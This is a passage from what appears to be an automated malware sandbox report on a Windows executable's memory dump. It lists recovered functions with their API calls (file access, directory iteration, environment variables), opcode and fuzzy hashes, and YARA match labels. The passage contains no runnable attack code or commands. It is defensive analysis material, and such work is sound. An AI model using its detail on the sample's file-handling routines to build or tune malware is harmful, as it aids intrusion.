                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,?,?,?,?,?,00477B1B,00477B1B), ref: 00434098
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,0000000F,?,?,?,?,?,00477B1B,00477B1B), ref: 004340C3
                                                                                                                                                      • Part of subcall function 00433F5C: CoCreateInstance.OLE32(0046BCF0,00000000,00000001,0046BCC0,?), ref: 00433F7F
                                                                                                                                                      • Part of subcall function 00434585: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,751469A0,?,?,00427460,00000000), ref: 0043459C
                                                                                                                                                      • Part of subcall function 00434585: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,0000001B,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,751469A0), ref: 004345C3
                                                                                                                                                      • Part of subcall function 004443B8: _free.LIBCMT ref: 004443CB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$CreateH_prologInstance_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1659153025-0
                                                                                                                                                    • Opcode ID: ce81a97329bbb44d8daab548be712ae203ef55d56b2f7a103258b1b9d9809fe2
                                                                                                                                                    • Instruction ID: e4b6aabeca1eeea922b2302e0dca35cdd29ffd8862237090bf34d26be4d430b1
                                                                                                                                                    • Opcode Fuzzy Hash: ce81a97329bbb44d8daab548be712ae203ef55d56b2f7a103258b1b9d9809fe2
                                                                                                                                                    • Instruction Fuzzy Hash: 02210A716003069FDB18AF69CC45AAF7BB9EF84714F10053FF51296381DFB499408B98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040BBE2, Relevance: 4.6, APIs: 3, Instructions: 71COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040BBE7
                                                                                                                                                    • ___std_fs_directory_iterator_open@12.LIBCPMT ref: 0040BC52
                                                                                                                                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040BC66
                                                                                                                                                      • Part of subcall function 0043DA6F: FindNextFileW.KERNEL32(?,?,?,0040BC6B,?,?,?,?,?,?,?,?,00000000), ref: 0043DA78
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFindH_prologNext___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3696715561-0
                                                                                                                                                    • Opcode ID: db02660187be9b5c20548a4cf91077df55968e760667a3fcbb8d87a60832dec5
                                                                                                                                                    • Instruction ID: 02857f8420a7b8bb83519b5194ffa8cf7975f9e5bce0f96e5d62f6075e737256
                                                                                                                                                    • Opcode Fuzzy Hash: db02660187be9b5c20548a4cf91077df55968e760667a3fcbb8d87a60832dec5
                                                                                                                                                    • Instruction Fuzzy Hash: 5A21AC31618605ABEF24AE98D985BDE73B4EF09718F10442FF801B62C0DB389A45979E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041C577, Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000244,?,?,0041D335,00000140,?,?,00000000), ref: 0041C594
                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000140,00000000,?,0041D335,00000140,?,?,00000000,?,0041DBDE), ref: 0041C5B5
                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,0041D335,00000140,?,?,00000000,?,0041DBDE,?,?,00000244,00486A80), ref: 0041C5EF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Pointer$Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 250661774-0
                                                                                                                                                    • Opcode ID: 2cbbbc77102b70510cbc4aea212530c7f32f58080070358399905c5ba68d646d
                                                                                                                                                    • Instruction ID: 09108e130841376c3154566b7e0e47100e27a77a256a3332ab282479dd426716
                                                                                                                                                    • Opcode Fuzzy Hash: 2cbbbc77102b70510cbc4aea212530c7f32f58080070358399905c5ba68d646d
                                                                                                                                                    • Instruction Fuzzy Hash: A9118270640311FEE7108B399CC9B96BBD8EB0A764F108726F925E72C1D3B5A9508B69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043C695, Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileMappingA.KERNEL32 ref: 0043C6C8
                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,4876E7FF,?,?,00004098,00487758,00000000,?,0043D638,?,?,0042A827), ref: 0043C6E5
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00004098,00487758,00000000,?,0043D638,?,?,0042A827), ref: 0043C6F5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseCreateHandleMappingView
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1187395538-0
                                                                                                                                                    • Opcode ID: 73ea994db21582f03bd74e09182c3504e390d925065be93d3cffc3666ed27616
                                                                                                                                                    • Instruction ID: 7bc5c55b20d385e2490a2a495697bd2c70d19414b6b365f59506210859840615
                                                                                                                                                    • Opcode Fuzzy Hash: 73ea994db21582f03bd74e09182c3504e390d925065be93d3cffc3666ed27616
                                                                                                                                                    • Instruction Fuzzy Hash: 4E11CC70500B159FD7318B168C88E13B7E8FB99370F10552FE4D691A50E774D840DF19
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004586F4, Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,0043E67F,00000000,00000002,0043E67F,00000000,?,?,?,004587A1,00000000,00000000,0043E67F,00000002), ref: 0045872D
                                                                                                                                                    • GetLastError.KERNEL32(?,004587A1,00000000,00000000,0043E67F,00000002,?,00444E04,?,00000000,00000000,00000001,0043E67F,?,?,00444EBA), ref: 00458737
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 0045873E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2336955059-0
                                                                                                                                                    • Opcode ID: cbff7514031e2e071776527a0189fec0228443e4f9dff311ebff60b474ef1951
                                                                                                                                                    • Instruction ID: 9a9910ca21fca52f6750d1040344aa9b56bc22d7f5ac5cd7b30b2df8157590e7
                                                                                                                                                    • Opcode Fuzzy Hash: cbff7514031e2e071776527a0189fec0228443e4f9dff311ebff60b474ef1951
                                                                                                                                                    • Instruction Fuzzy Hash: 65012832600515AFDF059B96DC0589E3B29DB85325734021EFC21AB291FE74DD518799
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00428ACE, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 290COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00428AD3
                                                                                                                                                      • Part of subcall function 0040BE6B: __EH_prolog.LIBCMT ref: 0040BE70
                                                                                                                                                      • Part of subcall function 004131CF: _Deallocate.LIBCONCRT ref: 004131E4
                                                                                                                                                      • Part of subcall function 0042943B: __EH_prolog.LIBCMT ref: 00429440
                                                                                                                                                      • Part of subcall function 004133AD: _Deallocate.LIBCONCRT ref: 004133BC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog$Deallocate
                                                                                                                                                    • String ID: "\
                                                                                                                                                    • API String ID: 2428181759-2226538752
                                                                                                                                                    • Opcode ID: eebcb1116a0d9e3bbfb13a6fb9e1a08ab4a1d8776be72e62d8880c1e6fa4dc27
                                                                                                                                                    • Instruction ID: 32bdca859101a542dd4c02fc4f3369b3d46b84dc0ac4277e0164dac03a4d01c3
                                                                                                                                                    • Opcode Fuzzy Hash: eebcb1116a0d9e3bbfb13a6fb9e1a08ab4a1d8776be72e62d8880c1e6fa4dc27
                                                                                                                                                    • Instruction Fuzzy Hash: 4EC1DF30E0525CCBDB14DFA5D950AEDBBB1AF55304F6081AED449B7242DF381B88CB69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041803C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 137COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00418041
                                                                                                                                                      • Part of subcall function 00434690: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 004346DC
                                                                                                                                                      • Part of subcall function 004341EF: __EH_prolog.LIBCMT ref: 004341F4
                                                                                                                                                      • Part of subcall function 004341EF: _strcat.LIBCMT ref: 0043424F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog$EnvironmentVariable_strcat
                                                                                                                                                    • String ID: a-." - 11% 5
                                                                                                                                                    • API String ID: 3009225943-2406193767
                                                                                                                                                    • Opcode ID: b6550889e4f556e59c6f3403feb9a805855f279cd1ad9a2afefe91579c738048
                                                                                                                                                    • Instruction ID: d245fdbe43d0c2215b997513f789f5f3dce6d7ce1a981225d77be576a0b68eeb
                                                                                                                                                    • Opcode Fuzzy Hash: b6550889e4f556e59c6f3403feb9a805855f279cd1ad9a2afefe91579c738048
                                                                                                                                                    • Instruction Fuzzy Hash: 6C51B035E01248DACF05EFE9D5915EEFBB1AF59304F10842EE80137242EB781B48CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00434B76, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 92COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00434B7B
                                                                                                                                                      • Part of subcall function 004137A2: __EH_prolog.LIBCMT ref: 004137A7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID: v,A
                                                                                                                                                    • API String ID: 3519838083-2547504984
                                                                                                                                                    • Opcode ID: 8bad4ced1937250aad760dff822de73ae0af70c225386b25eb4467404f82d30f
                                                                                                                                                    • Instruction ID: 789a3d8cdef0dd573e73a2ae49bc3f4129f2be1155343dae4acfc9682b926494
                                                                                                                                                    • Opcode Fuzzy Hash: 8bad4ced1937250aad760dff822de73ae0af70c225386b25eb4467404f82d30f
                                                                                                                                                    • Instruction Fuzzy Hash: 9B3127B1A01218DEEB24DF65DD85FE9F7B4BB44304F1081AFE40AA7281D7746E84CE24
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0045341F, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free
                                                                                                                                                    • String ID: :5E
                                                                                                                                                    • API String ID: 269201875-1916456701
                                                                                                                                                    • Opcode ID: d4061d95a3da949b4c7c390f523af11a0c3f7bb95a47a193c2086de09c357155
                                                                                                                                                    • Instruction ID: 6bf8d10918ffc3d6c252f4649f4c8162d05d89d33ba819d6ce7c0a8ceacdb61e
                                                                                                                                                    • Opcode Fuzzy Hash: d4061d95a3da949b4c7c390f523af11a0c3f7bb95a47a193c2086de09c357155
                                                                                                                                                    • Instruction Fuzzy Hash: 9231BF76A00610DF8B04CF5DC4C085EB7F2FF8A32172586A6E915EB361C334AD46CB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040B4D4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040B4D9
                                                                                                                                                      • Part of subcall function 0040A3D2: __EH_prolog.LIBCMT ref: 0040A3D7
                                                                                                                                                      • Part of subcall function 0040A3D2: std::exception::exception.LIBCONCRT ref: 0040A478
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog$std::exception::exception
                                                                                                                                                    • String ID: Unknown exception
                                                                                                                                                    • API String ID: 1037574509-410509341
                                                                                                                                                    • Opcode ID: 602959a5ad8da9e772a607438d6925e4eb6a03fcd3b02702cd9882a38ccf8f67
                                                                                                                                                    • Instruction ID: d7a89a15737c361b9bba582f9e251d35a3f30b9e747bf109c94da4fbdb893e2d
                                                                                                                                                    • Opcode Fuzzy Hash: 602959a5ad8da9e772a607438d6925e4eb6a03fcd3b02702cd9882a38ccf8f67
                                                                                                                                                    • Instruction Fuzzy Hash: 94219C72900304AFCB159FA9D8405EAFBB1FF08304F10C56EE919AB241D7769A45CB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00413CA5, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00413CAA
                                                                                                                                                      • Part of subcall function 0040BCA2: __EH_prolog.LIBCMT ref: 0040BCA7
                                                                                                                                                      • Part of subcall function 0040BDF2: __EH_prolog.LIBCMT ref: 0040BDF7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID: fPA
                                                                                                                                                    • API String ID: 3519838083-142295762
                                                                                                                                                    • Opcode ID: 951169ac43bd4080e7feda02af6e4de767cdf3989d2e20f385fd35d867aebce9
                                                                                                                                                    • Instruction ID: f293803bc1c95e2612b3718a47f0e77ff2c823c015e0c70d9901a30429203fa8
                                                                                                                                                    • Opcode Fuzzy Hash: 951169ac43bd4080e7feda02af6e4de767cdf3989d2e20f385fd35d867aebce9
                                                                                                                                                    • Instruction Fuzzy Hash: A5216DB19056159FDB64EF69C884B9EBBF0EF08304F0084AEE50AE7691DB389944CB55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00413C03, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00413C08
                                                                                                                                                      • Part of subcall function 0040BCA2: __EH_prolog.LIBCMT ref: 0040BCA7
                                                                                                                                                      • Part of subcall function 0040BDF2: __EH_prolog.LIBCMT ref: 0040BDF7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID: nPA
                                                                                                                                                    • API String ID: 3519838083-107484010
                                                                                                                                                    • Opcode ID: 227bd23dbc518e346064ba236f5c4fdef31e76131de1579e6256a66cb85fba0a
                                                                                                                                                    • Instruction ID: fb4b4587cf2db58e4b88101d667e4485d6d6933bc4aa8211aab1559f10369519
                                                                                                                                                    • Opcode Fuzzy Hash: 227bd23dbc518e346064ba236f5c4fdef31e76131de1579e6256a66cb85fba0a
                                                                                                                                                    • Instruction Fuzzy Hash: 171154729052149BDB54EF69C885B9EBBB4EF04304F0480AEE505A7291CB345E44CB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C112, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040C117
                                                                                                                                                      • Part of subcall function 00413CA5: __EH_prolog.LIBCMT ref: 00413CAA
                                                                                                                                                    Strings
                                                                                                                                                    • recursive_directory_iterator::recursive_directory_iterator, xrefs: 0040C151
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID: recursive_directory_iterator::recursive_directory_iterator
                                                                                                                                                    • API String ID: 3519838083-3545205060
                                                                                                                                                    • Opcode ID: c1b356ed2821490e924ed3fed9c79de62f921ab728f63c1215cb60d024f7b11f
                                                                                                                                                    • Instruction ID: 9423ed6f0b5f352ca049dcb8d9622d1cb1da0d03312a319b7b43fa5532d9890a
                                                                                                                                                    • Opcode Fuzzy Hash: c1b356ed2821490e924ed3fed9c79de62f921ab728f63c1215cb60d024f7b11f
                                                                                                                                                    • Instruction Fuzzy Hash: 28E039B2A10215ABC718DFA9C80069ABAE5EB58318B10C53FA449E3740EB78C9408BD8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040BE6B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040BE70
                                                                                                                                                      • Part of subcall function 00413C03: __EH_prolog.LIBCMT ref: 00413C08
                                                                                                                                                    Strings
                                                                                                                                                    • directory_iterator::directory_iterator, xrefs: 0040BEAA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID: directory_iterator::directory_iterator
                                                                                                                                                    • API String ID: 3519838083-2645264736
                                                                                                                                                    • Opcode ID: c77f3ee62b6e5d39f13ec37face323da28c877f906794bda6312570f0332aa77
                                                                                                                                                    • Instruction ID: d8496ffd959b4828c7fd8b6370b09572f911f5f412baac8d64146f203805c6d8
                                                                                                                                                    • Opcode Fuzzy Hash: c77f3ee62b6e5d39f13ec37face323da28c877f906794bda6312570f0332aa77
                                                                                                                                                    • Instruction Fuzzy Hash: 58E065B2A105159FC714DF68C40069A7AE5EB58318B10C53FB515E3740EB78D94087D8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00419F81, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___std_fs_set_current_path@4.LIBCPMT ref: 00419F8F
                                                                                                                                                      • Part of subcall function 0040B879: __EH_prolog2.LIBCMT ref: 0040B880
                                                                                                                                                    Strings
                                                                                                                                                    • current_path(const path&), xrefs: 00419F9D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog2___std_fs_set_current_path@4
                                                                                                                                                    • String ID: current_path(const path&)
                                                                                                                                                    • API String ID: 2482923176-1163517728
                                                                                                                                                    • Opcode ID: 70dc225a231e245eef05116243078d3d902ff68eeee8c7c6b37205caeaaaad45
                                                                                                                                                    • Instruction ID: bee7ea753291c73efcd3f48ceb29836cea6dad5ae33f402f4afe31cef6f0a090
                                                                                                                                                    • Opcode Fuzzy Hash: 70dc225a231e245eef05116243078d3d902ff68eeee8c7c6b37205caeaaaad45
                                                                                                                                                    • Instruction Fuzzy Hash: 08D0A931744620AB8B64792E78048C212ED5F4E318300842FF848C3200DB28CC8202EC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004532F6, Relevance: 3.1, APIs: 2, Instructions: 119COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                    • Opcode ID: b93ce9e9a73378ca8b6b48adef971829738a99dd67437c97757467d8080dd4ed
                                                                                                                                                    • Instruction ID: d112c1d8a402c407ad146f4070d87b9a8e6e4f278f5377a509cb206166fb3b74
                                                                                                                                                    • Opcode Fuzzy Hash: b93ce9e9a73378ca8b6b48adef971829738a99dd67437c97757467d8080dd4ed
                                                                                                                                                    • Instruction Fuzzy Hash: 1541F336A00604EFDB10DF68C880A5EB7B6EF89755F15446EE905EB342EB34EE05CB84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00456491, Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,00444EE1,900C408B,?,004569A4,00000010,00444EE1,?,00000000,0043E67F,00444EE1), ref: 0045652D
                                                                                                                                                    • GetLastError.KERNEL32(?,004569A4,00000010,00444EE1,?,00000000,0043E67F,00444EE1,00444EE1,00000010,004439FE,00000000,8304488B,0043E67F,0043E67F,?), ref: 00456553
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 442123175-0
                                                                                                                                                    • Opcode ID: d253eac75c02f9b99eebf79d2704fbd475905b5554312629512fbc81130d9a41
                                                                                                                                                    • Instruction ID: 356a86f1a65a49dc9005ba010411890330fed97bf8cf59a2bccce8be8be39574
                                                                                                                                                    • Opcode Fuzzy Hash: d253eac75c02f9b99eebf79d2704fbd475905b5554312629512fbc81130d9a41
                                                                                                                                                    • Instruction Fuzzy Hash: 6D21A530A00118ABCF15CF19DD809DDB7B9EF49305F5140AAE90AD7212E734DD868B69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040A3D2, Relevance: 3.1, APIs: 2, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040A3D7
                                                                                                                                                    • std::exception::exception.LIBCONCRT ref: 0040A478
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prologstd::exception::exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2619619420-0
                                                                                                                                                    • Opcode ID: dcfd1e587e88ce8151b7cf3259a211d137cf716718b2b3191c800364e7ad601d
                                                                                                                                                    • Instruction ID: 3a58d486795720f100994925e5fd9439a9f8776860828b1cb9e69196a6b5a0be
                                                                                                                                                    • Opcode Fuzzy Hash: dcfd1e587e88ce8151b7cf3259a211d137cf716718b2b3191c800364e7ad601d
                                                                                                                                                    • Instruction Fuzzy Hash: 7431F771900208DFCB05EFA9C895ADEBBB4FF18314F44842EE415A7241EB78AA85CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041D2E0, Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,0041DBDE,?,?,00000244,00486A80,00000000,004868B8,?,0041DF28), ref: 0041D2FF
                                                                                                                                                    • _strlen.LIBCMT ref: 0041D306
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentDirectory_strlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 942933051-0
                                                                                                                                                    • Opcode ID: d003027bfc6f1579b5f7b6eb8c0c6b9c115e93c1ad0f8fdac66d893dbd780a54
                                                                                                                                                    • Instruction ID: 229f8697e6e8b1e9099a8443dc3575dba1d6f5b67a222c0bf9ea01191da8e24c
                                                                                                                                                    • Opcode Fuzzy Hash: d003027bfc6f1579b5f7b6eb8c0c6b9c115e93c1ad0f8fdac66d893dbd780a54
                                                                                                                                                    • Instruction Fuzzy Hash: 2901F0B2904305AED72856699841BEF33D5DB45710F50012FF875D6191E67CADC2921E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00433EAD, Relevance: 3.0, APIs: 2, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00433EB2
                                                                                                                                                      • Part of subcall function 00433D6F: lstrlenW.KERNEL32(00000000,?,?,?,00433EC3), ref: 00433DD1
                                                                                                                                                      • Part of subcall function 00433D6F: lstrcpyW.KERNEL32 ref: 00433DE9
                                                                                                                                                      • Part of subcall function 00433D6F: lstrcpyW.KERNEL32 ref: 00433DF5
                                                                                                                                                    • _strlen.LIBCMT ref: 00433EC6
                                                                                                                                                      • Part of subcall function 00411B13: __EH_prolog.LIBCMT ref: 00411B18
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prologlstrcpy$_strlenlstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 27009005-0
                                                                                                                                                    • Opcode ID: 7b5e9c96ed9f4cbf6b95e0b18ca6c3ca0e1f421eae0236bbe7c1e3819e355fe5
                                                                                                                                                    • Instruction ID: 596f9401428cf76c8096b2cb15cdecd84716f3bef7b64d5c68715a3c40d30442
                                                                                                                                                    • Opcode Fuzzy Hash: 7b5e9c96ed9f4cbf6b95e0b18ca6c3ca0e1f421eae0236bbe7c1e3819e355fe5
                                                                                                                                                    • Instruction Fuzzy Hash: 21114C70D05615CAEB14EF65CC01EEEBB749F54348F10819EE00AA7251EB385F88CBAC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043C883, Relevance: 3.0, APIs: 2, Instructions: 49fileCOMMON
